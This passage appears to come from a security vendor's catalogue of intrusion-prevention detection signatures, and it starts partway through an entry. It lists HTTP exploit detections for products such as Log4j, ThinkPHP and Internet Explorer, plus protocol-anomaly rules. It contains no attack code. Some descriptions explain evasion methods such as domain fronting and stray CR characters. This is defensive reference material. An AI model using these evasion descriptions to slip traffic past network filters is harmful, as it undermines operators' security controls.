Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, VMware vCenter Server, CVE2011, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-712-5211
Vulnerability: VMware-Vcenter-Update-Manager-Directory-Traversal
Description:
Back to top

HTTP_CS_Apache-Flink-FileUploadHandler-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in Apache Flink detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Flink, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1324-5242
Last changed: sgpkg-ips-1570-5242
Vulnerability: Apache-Flink-FileUploadHandler-Arbitrary-File-Upload
Description:
Back to top

HTTP_CS_Codesys-V3-Cmpwebserver-And-Cmpwebserverhandler-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Smart Software Solutions CoDeSys Control
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Smart Software Solutions CoDeSys, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1212-5242
Last changed: sgpkg-ips-1252-5242
Vulnerability: Codesys-V3-Cmpwebserver-And-Cmpwebserverhandler-Heap-Buffer-Overflow
Description:
Back to top

HTTP_CS_FusionPBX-Operator-Panel-Exec.php-Command-Execution

About this situation: A vulnerability in FusionPBX detected
Context: HTTP Client Stream
Severity: 7
Tags: Unix, Linux, Any Hardware, FusionPBX, CVE2019, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1206-5242
Last changed: sgpkg-ips-1279-5242
Vulnerability: FusionPBX-Operator-Panel-Exec.php-Command-Execution
Description:
Back to top

HTTP_CS_GE-Fanuc-Real-Time-Portal-Sensitive-Information-Disclosure

About this situation: An attempt to execute Ge Fanuc Real Time Portal RMI commands detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Ge Fanuc Real Time Portal, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-1272-5242
Vulnerability: GE-Fanuc-Real-Time-Portal-Sensitive-Information-Disclosure
Description:
Back to top

HTTP_CS_Log4j-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Log4j detected
Context: HTTP Client Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Apache Software Foundation Log4j, CVE2021, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1413-5242
Last changed: sgpkg-ips-1614-5242
Vulnerability: Log4j-Remote-Code-Execution
Description:
Back to top

HTTP_CS_Log4j-Remote-Code-Execution-Environment-Variable-Leak

About this situation: An attempt to exploit a vulnerability in Log4j detected
Context: HTTP Client Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Apache Software Foundation Log4j, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1416-5242
Last changed: sgpkg-ips-1418-5242
Vulnerability: Log4j-Remote-Code-Execution
Description:
Back to top

HTTP_CS_Log4j-Remote-Code-Execution-Evasion

About this situation: An attempt to exploit a vulnerability in Log4j detected
Context: HTTP Client Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Apache Software Foundation Log4j, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1416-5242
Last changed: sgpkg-ips-1614-5242
Vulnerability: Log4j-Remote-Code-Execution
Description:
Back to top

HTTP_CS_Openemr-Backup.php-Command-Injection

About this situation: An attempt to exploit a vulnerability in OpenEMR detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenEMR Development Team OpenEMR, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1329-5242
Last changed: sgpkg-ips-1329-5242
Vulnerability: Openemr-Backup.php-Command-Injection
Description:
Back to top

HTTP_CS_qdPM-9.1-Authenticated-Arbitrary-PHP-File-Upload

About this situation: An attempt to exploit a vulnerability in qdPM detected.
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Linux, Any Hardware, qdPM, CVE2020, Windows not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1525-5242
Last changed: sgpkg-ips-1525-5242
Vulnerability: qdPM-9.1-Authenticated-Arbitrary-PHP-File-Upload
Description:
Back to top

HTTP_CS_ThinkPHP-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in ThinkPHP
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ThinkPHP, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1321-5242
Last changed: sgpkg-ips-1735-5242
Vulnerability: ThinkPHP-Remote-Code-Execution
Description:
Back to top

HTTP_CS_Wordpress-Download-Manager-Unauthenticated-Remote-File-Upload

About this situation: An attempt to exploit a vulnerability in Wordpress Download Manager detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Wordpress Download Manager, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1326-5242
Last changed: sgpkg-ips-1326-5242
Vulnerability: Wordpress-Download-Manager-Unauthenticated-Remote-File-Upload
Description:
Back to top

HTTP_CS_Xstream-Library-Insecure-Xml-Deserialization-CVE-2021-39144

About this situation: An attempt to exploit a vulnerability in Xstream library insecure deserialization detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, XStream, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1520-5242
Last changed: sgpkg-ips-1521-5242
Vulnerability: Xstream-Library-Insecure-Deserialization
Description:
Back to top

HTTP_Decompression-Error

About this situation: HTTP Content-Encoding error
Context: HTTP without parameters
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-441-4219
Last changed: sgpkg-ips-492-5211
Description: In HTTP headers, Content-Encoding gzip or deflate was declared, but data is not correctly encoded. The data may be uncompressed, or an incorrect encoding may be in use.
Back to top

HTTP_Decompression-GZip-Extra-Header

About this situation: HTTP Content-Encoding gzip extra header seen
Context: HTTP without parameters
Severity: 2
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-784-5211
Last changed: sgpkg-ips-784-5211
Description: In HTTP Content-Encoding gzip is used, and the gzip header includes an extra field. This may be an attempt at exploiting Firefox.
Back to top

HTTP_Decompression-Ratio-Large

About this situation: HTTP Content-Encoding gzip ratio is large
Context: HTTP without parameters
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-604-5211
Last changed: sgpkg-ips-604-5211
Vulnerability: Apache-HTTP-Server-Mod_Deflate-Denial-Of-Service
Description: In HTTP headers, Content-Encoding gzip or deflate is used, and the compression ratio is very large. This can be a sign of a DOS attack.
Back to top

HTTP_Decompression-Stream-Error

About this situation: Error decompressing compressed HTTP data
Context: HTTP without parameters
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-441-4219
Last changed: sgpkg-ips-492-5211
Description: An error was encountered while decompressing compressed HTTP data. This may indicate a faulty content encoding, or an evasion attempt.
Back to top

HTTP_Display_User_Warning

About this situation: SSL decryption and inspection notification
Context: SSM Context
Severity: 5
Tags: SSM SSH Proxy, Inspection
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: The user has been warned that SSL-protected HTTP sessions have been decrypted, inspected, and re-encrypted by the firewall.
Back to top

HTTP_eCentrex-VOIP-Client-Component-ActiveX-Control-Buffer-Overflow

About this situation: Buffer overflow exploit against the eCentrex VOIP Client Component ActiveX control detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, eCentrex VOIP Client Component, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-119-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP-eCentrex-VOIP-Client-Component-ActiveX-Control-Buffer-Overflow
Description:
Back to top

HTTP_EMF-Windows-Graphics-Rendering-Engine-BOF

About this situation: Detects EMF images that will cause a buffer overflow in Windows Graphics Rendering Engine
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Windows Graphics Rendering Engine, MS2004-10, CVE2004, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-15-1210
Last changed: sgpkg-ips-248-3038
Vulnerability: EMF-Windows-Graphics-Rendering-Engine-BOF
Description:
Back to top

HTTP_EMF-Windows-Graphics-Rendering-Engine-BOF-2

About this situation: Detects EMF images that will cause a buffer overflow in Windows Graphics Rendering Engine
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Windows Graphics Rendering Engine, MS2004-10, CVE2004, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-371-4219
Last changed: sgpkg-ips-371-4219
Vulnerability: EMF-Windows-Graphics-Rendering-Engine-BOF
Description:
Back to top

HTTP_EnjoySAP-kwedit-ActiveX-Control-Buffer-Overflow

About this situation: Detected attempt to use vulnerable method of kwedit ActiveX component of EnjoySAP
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, EnjoySAP, CVE2007, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-262-3038
Vulnerability: EnjoySAP-kwedit-ActiveX-Control-Buffer-Overflow
Description:
Back to top

HTTP_EnjoySAP-rfcguisink-ActiveX-Control-Buffer-Overflow

About this situation: Detected attempt to use vulnerable method of rfcguisink ActiveX component of EnjoySAP
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, EnjoySAP, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: EnjoySAP-rfcguisink-ActiveX-Control-Buffer-Overflow
Description:
Back to top

HTTP_Executable-File-Within-Downloaded-MS-OLE

About this situation: Executable file within OLE detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, x86, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-344-4219
Last changed: sgpkg-ips-375-4219
Vulnerability: Executable-File-In-Document
Description:
Back to top

HTTP_F-Prot-Anti-Virus-ACE-File-Denial-Of-Service

About this situation: Malicious ACE archive file detected
Context: HTTP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, F-Prot Anti-Virus, CVE2006, Any Operating System not specific, Potential Denial of Service, TCP Server Traffic
First detected in: sgpkg-ips-90-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-F-Prot-Anti-Virus-ACE-File-Denial-Of-Service
Description:
Back to top

HTTP_F-Prot-Anti-Virus-CHM-File-Heap-Overflow

About this situation: Malicious compressed help (CHM) file detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, F-Prot Anti-Virus, CVE2006, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-90-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-F-Prot-Anti-Virus-CHM-File-Heap-Overflow
Description:
Back to top

HTTP_Firefox-BMP-Parser-Buffer-Overflow

About this situation: Detects BPM images that may cause a buffer overflow when viewed with FireFox
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Mozilla Firefox, CVE2004, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-15-1210
Last changed: sgpkg-ips-158-2032
Vulnerability: HTTP-Firefox-BMP-Parser-Buffer-Overflow
Description:
Back to top

HTTP_Firefox-Cookie-Site-Bondary-Bypass

About this situation: An attempt to exploit site boundary bypass vulnerability in Mozilla Firefox was detected
Context: HTTP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2007, Any Operating System not specific, Potential Disclosure, TCP Server Traffic
First detected in: sgpkg-ips-97-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: Firefox-Cookie-Site-Bondary-Bypass
Description:
Back to top

HTTP_Firefox-Executable-Image-Dragging-Vulnerability

About this situation: Executable file extension in HTML image file
Context: HTTP Server Stream
Severity: 7
Tags: Windows, x86, Mozilla Firefox, Mozilla Suite, Mozilla Thunderbird, CVE2005, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-62-1210
Last changed: sgpkg-ips-158-2032
Vulnerability: HTTP-Firefox-Executable-Image-Dragging-Vulnerability
Description:
Back to top

HTTP_Gnu-Tar-PAX-Extended-Headers-Handling-Buffer-Overflow

About this situation: Detects Gnu Tar PAX Extended Headers Handling Buffer Overflow exploits
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GNU Tar, CVE2006, Any Operating System not specific, Denial of Service, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-63-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic-Gnu-Tar-PAX-Extended-Headers-Handling-Buffer-Overflow
Description:
Back to top

HTTP_Header-Binary

About this situation: Binary data in header
Context: SSM Context
Severity: 5
Tags: SSM HTTP Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Binary data detected in header. Blocking request.
Back to top

HTTP_Header-Name

About this situation: Header name invalid
Context: SSM Context
Severity: 5
Tags: SSM HTTP Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Invalid characters found in a header name. Session terminated.
Back to top

HTTP_Header-No-Delimiter

About this situation: Invalid header
Context: SSM Context
Severity: 5
Tags: SSM HTTP Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Header has no delimiter.
Back to top

HTTP_Header-No-Name

About this situation: Header contains no name
Context: SSM Context
Severity: 5
Tags: SSM HTTP Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Header has ':' as the first character.
Back to top

HTTP_Header-Strict

About this situation: Malformed header
Context: SSM Context
Severity: 5
Tags: SSM HTTP Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Malformed header, unable to find ':'. Session terminated.
Back to top

HTTP_Headerline-CR

About this situation: HTTP header line contains a stray CR character
Context: HTTP without parameters
Severity: 5
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-702-5211
Description: An HTTP header line contains a CR character that is not part of a normal line terminating sequence CRLF. Risk analysis: Risk level is medium. Legitimate HTTP clients or servers should not use a single CR in headers. As different HTTP implementations may or may not treat a single CR as a header line terminator, it could be used as an IPS evasion. This situation may also be produced if non-HTTP traffic is being forwarded to common HTTP ports such as TCP/80 and TCP/8080. For example the common test tool for network bandwith, www.speedtest.net, may produce this situation.
Back to top

HTTP_Headerline_LF

About this situation: HTTP header line ends in a single linefeed character
Context: HTTP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-405-4219
Description: Single LF character is used for a newline on HTTP header line even though previous lines had correct CRLF. Risk analysis: Risk level is Low. Previous lines have correctly used CRLF pair but this one has only LF. Legitimate clients should never do this.
Back to top

HTTP_Headerline_LFCR

About this situation: HTTP header line ends in LFCR
Context: HTTP without parameters
Severity: 5
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-635-5211
Last changed: sgpkg-ips-635-5211
Description: An HTTP header line ends in reversed end-of-line characters (LFCR instead of CRLF). Risk analysis: Risk level is medium. This is a highly unusual anomaly that contravenes the HTTP protocol specification. No legitimate client or server may produce such a header line. Some attacks against the HTTP protocol use this sort of reversal to try to trigger failures.
Back to top

HTTP_Headerline_LFCRLF

About this situation: HTTP Header line contains extra newline character
Context: HTTP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-405-4219
Description: HTTP header line contains illegal sequence of LF followed by CRLF. Risk analysis: Risk level is Low. No legitimate client or server should produce such a header line, but scripts and attacks may do.
Back to top

HTTP_Host

About this situation: Invalid Host
Context: SSM Context
Severity: 5
Tags: SSM HTTP Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Invalid host name in a Host header.
Back to top

HTTP_Host-SNI-Mismatch

About this situation: HTTP client sent an HTTPS request with mismatching hostnames in the TLS SNI extension and the HTTP Host header
Context: HTTP without parameters
Severity: 5
Tags: Protocol Information
First detected in: sgpkg-ips-1392-5242
Last changed: sgpkg-ips-1434-5242
Description: The HTTP client sent an HTTPS request with mismatching hostnames in the TLS Server Name Indication (SNI) extension and the HTTP Host header. This practice, sometimes called domain fronting, is often used to hide the final destination of an HTTPS request in an attempt to circumvent domain-based traffic restrictions. The client connects to a server in an allowed "front" domain, placing its hostname in the SNI. As an encrypted connection has been established with the front server, the client sends it an HTTPS request with a different hostname in the HTTP Host header that may point to an entirely different domain which may be blocked in the client's network. A suitably configured server may then proxy the connection to the final destination indicated by the Host header, unseen by intervening firewalls or packet filters in the client's network due to encryption. Not all uses of domain fronting are inherently malicious, but the practice is against the HTTPS protocol standards and may violate terms of use of some content delivery networks (CDNs) that are often used as front domains. It may also be used to gain access to websites that the network administrator might want to filter out. If strict compliance is desired, this situation should be set to terminate.
Back to top

HTTP_HP-Software-Update-Tool-ActiveX-Control-File-Overwrite

About this situation: An attempt to exploit a vulnerability in HP RulesEngine.dll ActiveX CTL detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, HP Software Update, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-137-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP_HP-Software-Update-Tool-ActiveX-Control-File-Overwrite
Description:
Back to top

HTTP_HTML-Tag-Detector

About this situation: Detects HTML tags and sets a variable
Context: HTTP Server Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-516-5211
Vulnerability: HTML-Tag-Detector
Description:
Back to top

HTTP_Ie-Anchorclick-Style-File-Import

About this situation: IE file import to Windows startup folder via user drag and drop
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2004-12, CVE2004, Windows not specific, Internet Explorer not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Ie-Anchorclick-Style-File-Import
Description:
Back to top

HTTP_Ie-HTTP-Equiv-Meta-Tag-DoS

About this situation: Detects suspicious http-equiv meta tags
Context: HTTP Server Stream
Severity: 2
Tags: Windows, Any Hardware, Internet Explorer, CVE2004, Windows not specific, Internet Explorer not specific, Potential Denial of Service, TCP Server Traffic
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-272-4219
Vulnerability: HTTP-Ie-HTTP-Equiv-Meta-Tag-DoS
Description:
Back to top

HTTP_Ie-Showhelp-Double-Colon-System-Compromise

About this situation: Detects calls of showHelp() with double colons and a directory-traversal attempt
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2004-07, CVE2003, Windows not specific, Internet Explorer not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Ie-Showhelp-Double-Colon-System-Compromise
Description:
Back to top

HTTP_Ie-Showhelp-Double-Slash-System-Compromise

About this situation: Detects calls of showHelp() with double backslashes
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, CVE2004, Windows not specific, Internet Explorer not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Ie-Showhelp-Double-Slash-System-Compromise
Description:
Back to top

HTTP_IE5-Filename-BOF

About this situation: Buffer overflow in IE5
Context: HTTP Server Stream
Severity: 10
Tags: Windows 95, Windows 98, Any Hardware, Internet Explorer 5.0, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-640-5211
Vulnerability: HTTP-IE5-Filename-Buffer-Overflow
Description:
Back to top

HTTP_IIS-IDQ-IDA-HTX-Access

About this situation: Microsoft IIS path disclosure via IDQ, IDA or HTX file
Context: HTTP Server Stream
Severity: 2
Tags: Windows, Any Hardware, IIS 5.0, IIS 4.0, CVE2000, Windows not specific, Potential Disclosure, TCP Server Traffic
First detected in: sgpkg-ips-4-1102
Last changed: sgpkg-ips-640-5211
Vulnerability: HTTP-IIS-IDQ-IDA-HTX-Path-Disclosure
Description:
Back to top

HTTP_IIS-IDQ-IDA-HTX-Access-Unsuccess

About this situation: Microsoft IIS path disclosure via IDQ, IDA or HTX file
Context: HTTP Server Stream
Severity: 2
Tags: Windows, Any Hardware, IIS 5.0, IIS 4.0, CVE2000, Windows not specific, Potential Disclosure, TCP Server Traffic
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-256-3038
Vulnerability: HTTP-IIS-IDQ-IDA-HTX-Path-Disclosure
Description:
Back to top

HTTP_IIS-Unicode-Encoding

About this situation: Microsoft IIS Unicode encoding detected
Context: HTTP without parameters
Severity: 2
Tags: Protocol Information, Anomalies
First detected in: sgpkg-ips-356-4219
Last changed: sgpkg-ips-356-4219
Description: Microsoft IIS Unicode encoding detected in an HTTP URL. The encoding represents Unicode code points as %u followed by four hexadecimal digits. The encoding is not widely used in normal HTTP connections.
Back to top

HTTP_Imagemagick-Psd-File-Channel-Buffer-Vulnerability-Download

About this situation: Invalid PSD file download detected
Context: HTTP Server Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Imagemagick, CVE2005, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-19-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: Psd-Imagemagick-Psd-File-Channel-Buffer-Vulnerability
Description:
Back to top

HTTP_Imagemagick-Sgi-File-Malformed-BPC-Field-Handling-Buffer-Overflow

About this situation: Detects buffer overflow exploits against ImageMagick SGI decoder component
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Imagemagick, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-80-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Imagemagick-Sgi-File-Malformed-BPC-Field-Handling-Buffer-Overflow
Description:
Back to top

HTTP_Imagemagick-Sgi-File-Malformed-ZSIZE-Field-Handling-Buffer-Overflow

About this situation: Detects buffer overflow exploits against ImageMagick SGI decoder component
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Imagemagick, CVE2006, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-80-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Imagemagick-Sgi-File-Malformed-ZSIZE-Field-Handling-Buffer-Overflow
Description:
Back to top

HTTP_Internet-Explorer-7-Navigation-Canceled-Page-Cross-Site-Scripting

About this situation: Attempt to exploit cross-site scripting vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 2
Tags: Windows, Any Hardware, Internet Explorer, MS2007-06, CVE2007, Windows not specific, Internet Explorer not specific, Potential Disclosure, TCP Server Traffic
First detected in: sgpkg-ips-101-1314
Last changed: sgpkg-ips-155-2032
Vulnerability: Internet-Explorer-7-Navigation-Canceled-Page-Cross-Site-Scripting
Description:
Back to top

HTTP_Internet-Explorer-Com-Object-Instantiation-Memory-Corruption

About this situation: Detects memory corruption exploits against Internet Explorer
Context: HTTP Server Stream
Severity: 7
Tags: Windows, x86, Internet Explorer, MS2006-06, CVE2006, Windows not specific, Internet Explorer not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-90-1314
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP-Internet-Explorer-Com-Object-Instantiation-Memory-Corruption
Description:
Back to top

HTTP_Internet-Explorer-Com-Object-System-Compromise

About this situation: CLSID of an illegal COM object detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, x86, Internet Explorer, MS2005-07, CVE2005, Windows not specific, Internet Explorer not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-31-1210
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP-Internet-Explorer-Com-Object-System-Compromise
Description:
Back to top

HTTP_Internet-Explorer-CreateTextRange-Vulnerability

About this situation: Detects Microsoft Internet Explorer createTextRange exploits
Context: HTTP Server Stream
Severity: 10
Tags: Windows, x86, Internet Explorer 5.0, Internet Explorer 6.0, Internet Explorer 5.5, MS2006-04, CVE2006, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-62-1210
Last changed: sgpkg-ips-352-4219
Vulnerability: HTTP-Internet-Explorer-CreateTextRange-Vulnerability
Description:
Back to top

HTTP_Internet-Explorer-DirectAnimation.DATuple-Com-Object-Memory-Corruption

About this situation: Detects memory corruption exploits against Internet Explorer
Context: HTTP Server Stream
Severity: 7
Tags: Windows, x86, Internet Explorer, MS2006-08, CVE2006, Windows not specific, Internet Explorer not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-79-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Internet-Explorer-DirectAnimation.DATuple-Com-Object-Memory-Corruption
Description:
Back to top

HTTP_Internet-Explorer-Imjpcksid.dll-Com-Object-Memory-Corruption

About this situation: Attempt to exploit memory corruption vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2007-02, CVE2006, Windows not specific, Internet Explorer not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-97-1314
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP_Internet-Explorer-Imjpcksid.dll-Com-Object-Memory-Corruption
Description:
Back to top

HTTP_Internet-Explorer-JPEG-Rendering-Memory-Corruption

About this situation: Attempt to exploit memory corruption vulnerability in the Internet Explorer JPEG rendering
Context: HTTP Server Stream
Severity: 7
